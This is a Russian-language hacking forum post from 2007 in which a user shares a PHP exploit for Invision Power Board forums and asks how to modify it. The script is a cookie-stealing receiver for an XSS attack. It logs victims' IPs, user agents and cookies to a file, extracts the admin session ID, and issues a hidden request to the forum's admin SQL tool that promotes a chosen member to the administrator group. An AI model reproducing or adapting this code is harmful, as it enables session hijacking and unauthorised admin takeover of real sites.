14.08.2007, 00:20
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Сообщение от Basurman
Это xss сплоит ) придется ссылки пихать жертве.
Я это все понял, у меня вопрос другой
PHP код:
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+
'.$prefix.'members+SET
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'. $member.'%27&st="></>';
}
?>
как вот это чудо отредактировать
Просто поднимает пользователя по определенного указанного уровня (1 - админ)
А вот тут я чето неврубился у админов группа вроде 4
Последний раз редактировалось FaR-G9; 14.08.2007 в 00:23..
|
|
|